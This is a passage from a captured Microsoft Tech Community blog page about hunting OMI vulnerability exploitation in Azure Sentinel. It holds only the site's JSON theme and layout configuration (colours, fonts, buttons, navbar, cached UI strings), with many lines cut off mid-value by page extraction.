0.51,\r\n1)\",\"__typename\":\"AnimationThemeSettings\"},\"avatar\":{\"borderRadius\":\"50%\",\"collections\":\r\n[\"default\"],\"__typename\":\"AvatarThemeSettings\"},\"basics\":{\"browserIcon\":{\"imageAssetName\":\"favicon-1730836283320.png\",\"imageLastModified\":\"1730836286415\",\"__typename\":\"ThemeAsset\"},\"customerLogo\":\r\n{\"imageAssetName\":\"favicon-1730836271365.png\",\"imageLastModified\":\"1730836274203\",\"__typename\":\"ThemeAsset\"},\"maximumWidthOfPageContent\":\"1300px\",\"oneColumnN\r\n{\"borderRadiusSm\":\"3px\",\"borderRadius\":\"3px\",\"borderRadiusLg\":\"5px\",\"paddingY\":\"5px\",\"paddingYLg\":\"7px\",\"paddingYHero\":\"var(-\r\n-lia-bs-btn-padding-y-lg)\",\"paddingX\":\"12px\",\"paddingXLg\":\"16px\",\"paddingXHero\":\"60px\",\"fontStyle\":\"NORMAL\",\"fontWeight\":\"700\",\"textTransform\":\"NONE\",\"disabled\r\n-lia-bs-white)\",\"primaryTextHoverColor\":\"var(--lia-bs-white)\",\"primaryTextActiveColor\":\"var(--lia-bs-white)\",\"primaryBgColor\":\"var(--lia-bs-primary)\",\"primaryBgHoverColor\":\"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.85))\",\"primaryBgActiveColor\":\"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.7))\",\"primaryBorder\":\"1px solid transparent\",\"primaryBorderHover\":\"1px solid\r\ntransparent\",\"primaryBorderActive\":\"1px solid transparent\",\"primaryBorderFocus\":\"1px solid var(--lia-bs-white)\",\"primaryBoxShadowFocus\":\"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)\",\"secondaryTextColor\":\"var(--lia-bs-gray-900)\",\"secondaryTextHoverColor\":\"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) *\r\n0.95))\",\"secondaryTextActiveColor\":\"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) *\r\n0.9))\",\"secondaryBgColor\":\"var(--lia-bs-gray-200)\",\"secondaryBgHoverColor\":\"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.96))\",\"secondaryBgActiveColor\":\"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.92))\",\"secondaryBorder\":\"1px solid\r\ntransparent\",\"secondaryBorderHover\":\"1px solid transparent\",\"secondaryBorderActive\":\"1px solid\r\ntransparent\",\"secondaryBorderFocus\":\"1px solid transparent\",\"secondaryBoxShadowFocus\":\"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l),\r\n0.2)\",\"tertiaryTextColor\":\"var(--lia-bs-gray-900)\",\"tertiaryTextHoverColor\":\"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) * 0.95))\",\"tertiaryTextActiveColor\":\"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-\r\ns), calc(var(--lia-bs-gray-900-l) *\r\n0.9))\",\"tertiaryBgColor\":\"transparent\",\"tertiaryBgHoverColor\":\"transparent\",\"tertiaryBgActiveColor\":\"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.04)\",\"tertiaryBorder\":\"1px solid\r\ntransparent\",\"tertiaryBorderHover\":\"1px solid hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),\r\n0.08)\",\"tertiaryBorderActive\":\"1px solid transparent\",\"tertiaryBorderFocus\":\"1px solid\r\ntransparent\",\"tertiaryBoxShadowFocus\":\"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)\",\"destructiveTextColor\":\"var(--lia-bs-danger)\",\"destructiveTextHoverColor\":\"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) *\r\n0.95))\",\"destructiveTextActiveColor\":\"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) *\r\n0.9))\",\"destructiveBgColor\":\"var(--lia-bs-gray-200)\",\"destructiveBgHoverColor\":\"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.96))\",\"destructiveBgActiveColor\":\"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.92))\",\"destructiveBorder\":\"1px solid\r\ntransparent\",\"destructiveBorderHover\":\"1px solid transparent\",\"destructiveBorderActive\":\"1px solid\r\ntransparent\",\"destructiveBorderFocus\":\"1px solid transparent\",\"destructiveBoxShadowFocus\":\"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l),\r\n0.2)\",\"__typename\":\"ButtonsThemeSettings\"},\"border\":{\"color\":\"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),\r\n0.08)\",\"mainContent\":\"NONE\",\"sideContent\":\"LIGHT\",\"radiusSm\":\"3px\",\"radius\":\"5px\",\"radiusLg\":\"9px\",\"radius50\":\"100vw\",\"__typename\":\"BorderT\r\n{\"xs\":\"0 0 0 1px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.08), 0 3px 0 -1px\r\nhsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.16)\",\"sm\":\"0 2px 4px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.12)\",\"md\":\"0 5px 15px hsla(var(--lia-bs-gray-900-h), var(--\r\nlia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.3)\",\"lg\":\"0 10px 30px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s),\r\nvar(--lia-bs-gray-900-l), 0.3)\",\"__typename\":\"BoxShadowThemeSettings\"},\"cards\":{\"bgColor\":\"var(--lia-panel-bg-color)\",\"borderRadius\":\"var(--lia-panel-border-radius)\",\"boxShadow\":\"var(--lia-box-shadow-xs)\",\"__typename\":\"CardsThemeSettings\"},\"chip\":\r\n{\"maxWidth\":\"300px\",\"height\":\"30px\",\"__typename\":\"ChipThemeSettings\"},\"coreTypes\":\r\n{\"defaultMessageLinkColor\":\"var(--lia-bs-link-color)\",\"defaultMessageLinkDecoration\":\"none\",\"defaultMessageLinkFontStyle\":\"NORMAL\",\"defaultMessageLinkFontWeight\":\"400\",\"defaultMessageF\r\n-lia-bs-font-family-base)\",\"forumColor\":\"#4099E2\",\"forumFontFamily\":\"var(--lia-bs-font-family-base)\",\"forumFontWeight\":\"var(--lia-default-message-font-weight)\",\"forumLineHeight\":\"var(--lia-bs-line-height-base)\",\"forumFontStyle\":\"var(--lia-default-message-font-style)\",\"forumMessageLinkColor\":\"var(--lia-default-message-link-color)\",\"forumMessageLinkDecoration\":\"var(--lia-default-message-link-decoration)\",\"forumMessageLinkFontStyle\":\"var(--\r\nlia-default-message-link-font-style)\",\"forumMessageLinkFontWeight\":\"var(--lia-default-message-link-font-weight)\",\"forumSolvedColor\":\"#148563\",\"blogColor\":\"#1CBAA0\",\"blogFontFamily\":\"var(--lia-bs-font-family-base)\",\"blogFontWeight\":\"var(--lia-default-message-font-weight)\",\"blogLineHeight\":\"1.75\",\"blogFontStyle\":\"var(--lia-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 22 of 38\n\ndefault-message-font-style)\",\"blogMessageLinkColor\":\"var(--lia-default-message-link-color)\",\"blogMessageLinkDecoration\":\"var(--lia-default-message-link-decoration)\",\"blogMessageLinkFontStyle\":\"var(--lia-default-message-link-font-style)\",\"blogMessageLinkFontWeight\":\"var(--lia-default-message-link-font-weight)\",\"tkbColor\":\"#4C6B90\",\"tkbFontFamily\":\"var(--lia-bs-font-family-base)\",\"tkbFontWeight\":\"var(--lia-default-message-font-weight)\",\"tkbLineHeight\":\"1.75\",\"tkbFontStyle\":\"var(--lia-default-message-font-style)\",\"tkbMessageLinkColor\":\"var(--lia-default-message-link-color)\",\"tkbMessageLinkDecoration\":\"var(--lia-default-message-link-decoration)\",\"tkbMessageLinkFontStyle\":\"var(--lia-default-message-link-font-style)\",\"tkbMessageLinkFontWeight\":\"var(--lia-default-message-link-font-weight)\",\"qandaColor\":\"#4099E2\",\"qandaFontFamily\":\"var(--lia-bs-font-family-base)\",\"qandaFontWeight\":\"var(--lia-default-message-font-weight)\",\"qandaLineHeight\":\"var(--lia-bs-line-height-base)\",\"qandaFontStyle\":\"var(--lia-default-message-link-font-style)\",\"qandaMessageLinkColor\":\"var(--lia-default-message-link-color)\",\"qandaMessageLinkDecoration\":\"var(--lia-default-message-link-decoration)\",\"qandaMessageLinkFontStyle\":\"var(--\r\nlia-default-message-link-font-style)\",\"qandaMessageLinkFontWeight\":\"var(--lia-default-message-link-font-weight)\",\"qandaSolvedColor\":\"#3FA023\",\"ideaColor\":\"#FF8000\",\"ideaFontFamily\":\"var(--lia-bs-font-family-base)\",\"ideaFontWeight\":\"var(--lia-default-message-font-weight)\",\"ideaLineHeight\":\"var(--lia-bs-line-height-base)\",\"ideaFontStyle\":\"var(--lia-default-message-font-style)\",\"ideaMessageLinkColor\":\"var(--lia-default-message-link-color)\",\"ideaMessageLinkDecoration\":\"var(--lia-default-message-link-decoration)\",\"ideaMessageLinkFontStyle\":\"var(--lia-default-message-link-font-style)\",\"ideaMessageLinkFontWeight\":\"var(--lia-default-message-link-font-weight)\",\"contestColor\":\"#FCC845\",\"contestFontFamily\":\"var(--lia-bs-font-family-base)\",\"contestFontWeight\":\"var(--lia-default-message-font-weight)\",\"contestLineHeight\":\"var(--lia-bs-line-height-base)\",\"contestFontStyle\":\"var(--lia-default-message-link-font-style)\",\"contestMessageLinkColor\":\"var(--lia-default-message-link-color)\",\"contestMessageLinkDecoration\":\"var(--lia-default-message-link-decoration)\",\"contestMessageLinkFontStyle\":\"ITALIC\",\"contestMessageLinkFontWeight\":\"var(--lia-default-message-link-font-weight)\",\"occasionColor\":\"#bc341b\",\"occasionFontFamily\":\"var(--lia-bs-font-family-base)\",\"occasionFontWeight\":\"var(--lia-default-message-font-weight)\",\"occasionLineHeight\":\"var(--lia-bs-line-height-base)\",\"occasionFontStyle\":\"var(--lia-default-message-font-style)\",\"occasionMessageLinkColor\":\"var(--lia-default-message-link-color)\",\"occasionMessageLinkDecoration\":\"var(--lia-default-message-link-decoration)\",\"occasionMessageLinkFontStyle\":\"var(--lia-default-message-link-font-style)\",\"occasionMessageLinkFontWeight\":\"var(--lia-default-message-link-font-weight)\",\"grouphubColor\":\"#333333\",\"categoryColor\":\"#949494\",\"communityColor\":\"#FFFFFF\",\"productColor\":\"#949494\",\"__typename\":\"CoreTypesT\r\n{\"black\":\"#000000\",\"white\":\"#FFFFFF\",\"gray100\":\"#F7F7F7\",\"gray200\":\"#F7F7F7\",\"gray300\":\"#E8E8E8\",\"gray400\":\"#D9D9D9\",\"gray500\":\"#CCCC\r\n-lia-bs-primary)\",\"custom\":[\"#D3F5A4\",\"#243A5E\"],\"__typename\":\"ColorsThemeSettings\"},\"divider\":\r\n{\"size\":\"3px\",\"marginLeft\":\"4px\",\"marginRight\":\"4px\",\"borderRadius\":\"50%\",\"bgColor\":\"var(--lia-bs-gray-600)\",\"bgColorActive\":\"var(--lia-bs-gray-600)\",\"__typename\":\"DividerThemeSettings\"},\"dropdown\":{\"fontSize\":\"var(--\r\nlia-bs-font-size-sm)\",\"borderColor\":\"var(--lia-bs-border-color)\",\"borderRadius\":\"var(--lia-bs-border-radius-sm)\",\"dividerBg\":\"var(--lia-bs-gray-300)\",\"itemPaddingY\":\"5px\",\"itemPaddingX\":\"20px\",\"headerColor\":\"var(--lia-bs-gray-700)\",\"__typename\":\"DropdownThemeSettings\"},\"email\":{\"link\":\r\n{\"color\":\"#0069D4\",\"hoverColor\":\"#0061c2\",\"decoration\":\"none\",\"hoverDecoration\":\"underline\",\"__typename\":\"EmailLinkSettings\"},\"border\":\r\n{\"color\":\"#e4e4e4\",\"__typename\":\"EmailBorderSettings\"},\"buttons\":\r\n{\"borderRadiusLg\":\"5px\",\"paddingXLg\":\"16px\",\"paddingYLg\":\"7px\",\"fontWeight\":\"700\",\"primaryTextColor\":\"#ffffff\",\"primaryTextHoverColor\":\"#fffff\r\nsolid transparent\",\"primaryBorderHover\":\"1px solid transparent\",\"__typename\":\"EmailButtonsSettings\"},\"panel\":\r\n{\"borderRadius\":\"5px\",\"borderColor\":\"#e4e4e4\",\"__typename\":\"EmailPanelSettings\"},\"__typename\":\"EmailThemeSettings\"},\"emoji\":\r\n{\"skinToneDefault\":\"#ffcd43\",\"skinToneLight\":\"#fae3c5\",\"skinToneMediumLight\":\"#e2cfa5\",\"skinToneMedium\":\"#daa478\",\"skinToneMediumDark\":\"#\r\n{\"color\":\"var(--lia-bs-body-color)\",\"fontFamily\":\"Segoe\r\nUI\",\"fontStyle\":\"NORMAL\",\"fontWeight\":\"400\",\"h1FontSize\":\"34px\",\"h2FontSize\":\"32px\",\"h3FontSize\":\"28px\",\"h4FontSize\":\"24px\",\"h5FontSize\":\"20\r\n-lia-bs-headings-font-weight)\",\"h2FontWeight\":\"var(--lia-bs-headings-font-weight)\",\"h3FontWeight\":\"var(--lia-bs-headings-font-weight)\",\"h4FontWeight\":\"var(--lia-bs-headings-font-weight)\",\"h5FontWeight\":\"var(--lia-bs-headings-font-weight)\",\"h6FontWeight\":\"var(--lia-bs-headings-font-weight)\",\"__typename\":\"HeadingThemeSettings\"},\"icons\":\r\n{\"size10\":\"10px\",\"size12\":\"12px\",\"size14\":\"14px\",\"size16\":\"16px\",\"size20\":\"20px\",\"size24\":\"24px\",\"size30\":\"30px\",\"size40\":\"40px\",\"size50\":\"50px\",\"s\r\n{\"bgColor\":\"var(--lia-bs-gray-900)\",\"titleColor\":\"var(--lia-bs-white)\",\"controlColor\":\"var(--lia-bs-white)\",\"controlBgColor\":\"var(--lia-bs-gray-800)\",\"__typename\":\"ImagePreviewThemeSettings\"},\"input\":\r\n{\"borderColor\":\"var(--lia-bs-gray-600)\",\"disabledColor\":\"var(--lia-bs-gray-600)\",\"focusBorderColor\":\"var(--lia-bs-primary)\",\"labelMarginBottom\":\"10px\",\"btnFontSize\":\"var(--lia-bs-font-size-sm)\",\"focusBoxShadow\":\"0 0 0 3px hsla(var(-\r\n-lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l),\r\n0.2)\",\"checkLabelMarginBottom\":\"2px\",\"checkboxBorderRadius\":\"3px\",\"borderRadiusSm\":\"var(--lia-bs-border-radius-sm)\",\"borderRadius\":\"var(--lia-bs-border-radius)\",\"borderRadiusLg\":\"var(--lia-bs-border-radius-lg)\",\"formTextMarginTop\":\"4px\",\"textAreaBorderRadius\":\"var(--lia-bs-border-radius)\",\"activeFillColor\":\"var(--lia-bs-primary)\",\"__typename\":\"InputThemeSettings\"},\"loading\":{\"dotDarkColor\":\"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.2)\",\"dotLightColor\":\"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l),\r\n0.5)\",\"barDarkColor\":\"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),\r\n0.06)\",\"barLightColor\":\"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l),\r\n0.4)\",\"__typename\":\"LoadingThemeSettings\"},\"link\":{\"color\":\"var(--lia-bs-primary)\",\"hoverColor\":\"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) -\r\n10%))\",\"decoration\":\"none\",\"hoverDecoration\":\"underline\",\"__typename\":\"LinkThemeSettings\"},\"listGroup\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 23 of 38\n\n{\"itemPaddingY\":\"15px\",\"itemPaddingX\":\"15px\",\"borderColor\":\"var(--lia-bs-gray-300)\",\"__typename\":\"ListGroupThemeSettings\"},\"modal\":{\"contentTextColor\":\"var(--lia-bs-body-color)\",\"contentBg\":\"var(--lia-bs-white)\",\"backgroundBg\":\"var(--lia-bs-black)\",\"smSize\":\"440px\",\"mdSize\":\"760px\",\"lgSize\":\"1080px\",\"backdropOpacity\":0.3,\"contentBoxShadowXs\":\"var(--lia-bs-box-shadow-sm)\",\"contentBoxShadow\":\"var(--lia-bs-box-shadow)\",\"headerFontWeight\":\"700\",\"__typename\":\"ModalThemeSettings\"},\"navbar\":{\"position\":\"FIXED\",\"background\":\r\n{\"attachment\":null,\"clip\":null,\"color\":\"var(--lia-bs-white)\",\"imageAssetName\":\"\",\"imageLastModified\":\"0\",\"origin\":null,\"position\":\"CENTER_CENTER\",\"repeat\":\"NO_REPEAT\",\"size\":\"COVER\",\"__typ\r\nsolid var(--lia-bs-border-color)\",\"boxShadow\":\"var(--lia-bs-box-shadow-sm)\",\"brandMarginRight\":\"30px\",\"brandMarginRightSm\":\"10px\",\"brandLogoHeight\":\"30px\",\"linkGap\":\"10px\",\"linkJustifyContent\":\"flex-start\",\"linkPaddingY\":\"5px\",\"linkPaddingX\":\"10px\",\"linkDropdownPaddingY\":\"9px\",\"linkDropdownPaddingX\":\"var(--lia-nav-link-px)\",\"linkColor\":\"var(--lia-bs-body-color)\",\"linkHoverColor\":\"var(--lia-bs-primary)\",\"linkFontSize\":\"var(--lia-bs-font-size-sm)\",\"linkFontStyle\":\"NORMAL\",\"linkFontWeight\":\"400\",\"linkTextTransform\":\"NONE\",\"linkLetterSpacing\":\"normal\",\"linkBorderRadius\":\"var(-\r\n-lia-bs-border-radius-sm)\",\"linkBgColor\":\"transparent\",\"linkBgHoverColor\":\"transparent\",\"linkBorder\":\"none\",\"linkBorderHover\":\"none\",\"linkBoxShadow\":\"none\",\"linkBoxS\r\n-lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)\",\"controllerBgHoverColor\":\"hsla(var(--lia-bs-black-h),\r\nvar(--lia-bs-black-s), var(--lia-bs-black-l), 0.1)\",\"controllerIconColor\":\"var(--lia-bs-body-color)\",\"controllerIconHoverColor\":\"var(--lia-bs-body-color)\",\"controllerTextColor\":\"var(--lia-nav-controller-icon-color)\",\"controllerTextHoverColor\":\"var(--lia-nav-controller-icon-hover-color)\",\"controllerHighlightColor\":\"hsla(30, 100%,\r\n50%)\",\"controllerHighlightTextColor\":\"var(--lia-yiq-light)\",\"controllerBorderRadius\":\"var(--lia-border-radius-50)\",\"hamburgerColor\":\"var(--lia-nav-controller-icon-color)\",\"hamburgerHoverColor\":\"var(--lia-nav-controller-icon-color)\",\"hamburgerBgColor\":\"transparent\",\"hamburgerBgHoverColor\":\"transparent\",\"hamburgerBorder\":\"none\",\"hamburgerBorderHover\":\"none\",\"collap\r\n-lia-nav-link-color)\",\"collapseMenuDividerOpacity\":0.16,\"__typename\":\"NavbarThemeSettings\"},\"pager\":\r\n{\"textColor\":\"var(--lia-bs-link-color)\",\"textFontWeight\":\"var(--lia-font-weight-md)\",\"textFontSize\":\"var(--lia-bs-font-size-sm)\",\"__typename\":\"PagerThemeSettings\"},\"panel\":{\"bgColor\":\"var(--lia-bs-white)\",\"borderRadius\":\"var(--lia-bs-border-radius)\",\"borderColor\":\"var(--lia-bs-border-color)\",\"boxShadow\":\"none\",\"__typename\":\"PanelThemeSettings\"},\"popover\":\r\n{\"arrowHeight\":\"8px\",\"arrowWidth\":\"16px\",\"maxWidth\":\"300px\",\"minWidth\":\"100px\",\"headerBg\":\"var(--lia-bs-white)\",\"borderColor\":\"var(--lia-bs-border-color)\",\"borderRadius\":\"var(--lia-bs-border-radius)\",\"boxShadow\":\"0 0.5rem\r\n1rem hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),\r\n0.15)\",\"__typename\":\"PopoverThemeSettings\"},\"prism\":{\"color\":\"#000000\",\"bgColor\":\"#f5f2f0\",\"fontFamily\":\"var(--font-family-monospace)\",\"fontSize\":\"var(--lia-bs-font-size-base)\",\"fontWeightBold\":\"var(--lia-bs-font-weight-bold)\",\"fontStyleItalic\":\"italic\",\"tabSize\":2,\"highlightColor\":\"#b3d4fc\",\"commentColor\":\"#62707e\",\"punctuationColor\":\"#6f6f6f\",\"namespaceOpacity\":\"\r\n0%, 100%,\r\n0.5)\",\"keywordColor\":\"#0076a9\",\"functionColor\":\"#d3284b\",\"variableColor\":\"#c14700\",\"__typename\":\"PrismThemeSettings\"},\"rte\":\r\n{\"bgColor\":\"var(--lia-bs-white)\",\"borderRadius\":\"var(--lia-panel-border-radius)\",\"boxShadow\":\" var(--lia-panel-box-shadow)\",\"customColor1\":\"#bfedd2\",\"customColor2\":\"#fbeeb8\",\"customColor3\":\"#f8cac6\",\"customColor4\":\"#eccafa\",\"customColor5\":\"#c2e0f4\",\"custo\r\n53%, 51%, 0.4)\",\"diffChangedColor\":\"hsla(43, 97%, 63%, 0.4)\",\"diffNoneColor\":\"hsla(0, 0%, 80%,\r\n0.4)\",\"diffRemovedColor\":\"hsla(9, 74%, 47%,\r\n0.4)\",\"specialMessageHeaderMarginTop\":\"40px\",\"specialMessageHeaderMarginBottom\":\"20px\",\"specialMessageItemMarginTop\":\"0\",\"specialMessageIt\r\n-lia-bs-gray-700)\",\"tableBorderStyle\":\"solid\",\"tableCellPaddingX\":\"5px\",\"tableCellPaddingY\":\"5px\",\"tableTextColor\":\"var(--lia-bs-body-color)\",\"tableVerticalAlign\":\"middle\",\"__typename\":\"RteThemeSettings\"},\"tags\":{\"bgColor\":\"var(--lia-bs-gray-200)\",\"bgHoverColor\":\"var(--lia-bs-gray-400)\",\"borderRadius\":\"var(--lia-bs-border-radius-sm)\",\"color\":\"var(--lia-bs-body-color)\",\"hoverColor\":\"var(--lia-bs-body-color)\",\"fontWeight\":\"var(--lia-font-weight-md)\",\"fontSize\":\"var(--lia-font-size-xxs)\",\"textTransform\":\"UPPERCASE\",\"letterSpacing\":\"0.5px\",\"__typename\":\"TagsThemeSettings\"},\"toasts\":\r\n{\"borderRadius\":\"var(--lia-bs-border-radius)\",\"paddingX\":\"12px\",\"__typename\":\"ToastsThemeSettings\"},\"typography\":\r\n{\"fontFamilyBase\":\"Segoe\r\nUI\",\"fontStyleBase\":\"NORMAL\",\"fontWeightBase\":\"400\",\"fontWeightLight\":\"300\",\"fontWeightNormal\":\"400\",\"fontWeightMd\":\"500\",\"fontWeightBold\r\n[{\"source\":\"SERVER\",\"name\":\"Segoe UI\",\"styles\":[{\"style\":\"NORMAL\",\"weight\":\"400\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"NORMAL\",\"weight\":\"300\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"NORMAL\",\"weight\":\"600\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"NORMAL\",\"weight\":\"700\",\"__typename\":\"FontStyleData\"},\r\n{\"style\":\"ITALIC\",\"weight\":\"400\",\"__typename\":\"FontStyleData\"}],\"assetNames\":[\"SegoeUI-normal-400.woff2\",\"SegoeUI-normal-300.woff2\",\"SegoeUI-normal-600.woff2\",\"SegoeUI-normal-700.woff2\",\"SegoeUI-italic-400.woff2\"],\"__typename\":\"CustomFont\"},{\"source\":\"SERVER\",\"name\":\"MWF Fluent Icons\",\"styles\":\r\n[{\"style\":\"NORMAL\",\"weight\":\"400\",\"__typename\":\"FontStyleData\"}],\"assetNames\":[\"MWFFluentIcons-normal-400.woff2\"],\"__typename\":\"CustomFont\"}],\"__typename\":\"TypographyThemeSettings\"},\"unstyledListItem\":\r\n{\"marginBottomSm\":\"5px\",\"marginBottomMd\":\"10px\",\"marginBottomLg\":\"15px\",\"marginBottomXl\":\"20px\",\"marginBottomXxl\":\"25px\",\"__typename\"\r\n{\"light\":\"#ffffff\",\"dark\":\"#000000\",\"__typename\":\"YiqThemeSettings\"},\"colorLightness\":\r\n{\"primaryDark\":0.36,\"primaryLight\":0.74,\"primaryLighter\":0.89,\"primaryLightest\":0.95,\"infoDark\":0.39,\"infoLight\":0.72,\"infoLighter\":0.85,\"infoLighte\r\nshared/client/components/common/Loading/LoadingDot-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-shared/client/components/common/Loading/LoadingDot-1775111751222\",\"value\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 24 of 38\n\n{\"title\":\"Loading...\"},\"localOverride\":false},\"CachedAsset:quilt:o365.prod:pages/blogs/BlogMessagePage:board:MicrosoftSentinelBlog-1775111749257\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"quilt:o365.prod:pages/blogs/BlogMessagePage:board:MicrosoftSentinelBlog-1775111749257\",\"value\":{\"id\":\"BlogMessagePage\",\"container\":{\"id\":\"Common\",\"headerProps\":\r\n{\"backgroundImageProps\":null,\"backgroundColor\":null,\"addComponents\":null,\"removeComponents\":\r\n[\"community.widget.bannerWidget\"],\"componentOrder\":null,\"__typename\":\"QuiltContainerSectionProps\"},\"headerComponentProps\":\r\n{\"community.widget.breadcrumbWidget\":\r\n{\"disableLastCrumbForDesktop\":false}},\"footerProps\":null,\"footerComponentProps\":null,\"items\":[{\"id\":\"blog-article\",\"layout\":\"ONE_COLUMN\",\"bgColor\":null,\"showTitle\":null,\"showDescription\":null,\"textPosition\":null,\"textColor\":null,\"sectionEditLevel\":\"LOC\r\n{\"main\":[{\"id\":\"blogs.widget.blogArticleWidget\",\"className\":\"lia-blog-container\",\"props\":null,\"__typename\":\"QuiltComponent\"}],\"__typename\":\"OneSectionColumns\"}},{\"id\":\"section-1729184836777\",\"layout\":\"MAIN_SIDE\",\"bgColor\":\"transparent\",\"showTitle\":false,\"showDescription\":false,\"textPosition\":\"CENTER\",\"textColor\":\"var\r\n-lia-bs-body-color)\",\"sectionEditLevel\":null,\"bgImage\":null,\"disableSpacing\":null,\"edgeToEdgeDisplay\":null,\"fullHeight\":null,\"showBorder\":null,\"__typename\":\"Ma\r\n{\"main\":[],\"side\":[{\"id\":\"custom.widget.UnregisteredCTAWidget\",\"className\":null,\"props\":\r\n{\"widgetVisibility\":\"anonymousOnly\",\"useTitle\":true,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false,\"widgetChooser\":\"custom.widget.UnregisteredCT\r\ncomponents/common/EmailVerification-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/common/EmailVerification-1775111751222\",\"value\":{\"email.verification.title\":\"Email Verification\r\nRequired\",\"email.verification.message.update.email\":\"To participate in the community, you must first verify your email\r\naddress. The verification email was sent to {email}. To change your email, visit My\r\nSettings.\",\"email.verification.message.resend.email\":\"To participate in the community, you must first verify your email\r\naddress. The verification email was sent to {email}. Resend email.\"},\"localOverride\":false},\"CachedAsset:text:en_US-pages/blogs/BlogMessagePage-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-pages/blogs/BlogMessagePage-1775111751222\",\"value\":{\"title\":\"{contextMessageSubject} |\r\n{communityTitle}\",\"errorMissing\":\"This blog post cannot be found\",\"name\":\"Blog Message Page\",\"section.blog-article.title\":\"Blog Post\",\"archivedMessageTitle\":\"This Content Has Been Archived\",\"section.section-1729184836777.title\":\"\",\"section.section-1729184836777.description\":\"\",\"section.CncIde.title\":\"Blog\r\nPost\",\"section.tifEmD.description\":\"\",\"section.tifEmD.title\":\"\"},\"localOverride\":false},\"CachedAsset:quiltWrapper:o365.prod:Common:1775111735108\"\r\n{\"__typename\":\"CachedAsset\",\"id\":\"quiltWrapper:o365.prod:Common:1775111735108\",\"value\":\r\n{\"id\":\"Common\",\"header\":{\"backgroundImageProps\":\r\n{\"assetName\":null,\"backgroundSize\":\"COVER\",\"backgroundRepeat\":\"NO_REPEAT\",\"backgroundPosition\":\"CENTER_CENTER\",\"lastModified\":null,\"\r\n[{\"id\":\"community.widget.navbarWidget\",\"props\":\r\n{\"showUserName\":true,\"showRegisterLink\":true,\"useIconLanguagePicker\":true,\"useLabelLanguagePicker\":true,\"style\":\r\n{\"boxShadow\":\"var(--lia-bs-box-shadow-sm)\",\"linkFontWeight\":\"400\",\"controllerHighlightColor\":\"hsla(30, 100%,\r\n50%)\",\"dropdownDividerMarginBottom\":\"10px\",\"hamburgerBorderHover\":\"none\",\"linkFontSize\":\"14px\",\"linkBoxShadowHover\":\"none\",\"backgroundO\r\n-lia-border-radius-50)\",\"hamburgerBgColor\":\"transparent\",\"linkTextBorderBottom\":\"none\",\"hamburgerColor\":\"var(--lia-nav-controller-icon-color)\",\"brandLogoHeight\":\"30px\",\"linkLetterSpacing\":\"normal\",\"linkBgHoverColor\":\"transparent\",\"collapseMenuDividerOpacity\":0.16,\"paddingBottom\r\nsolid 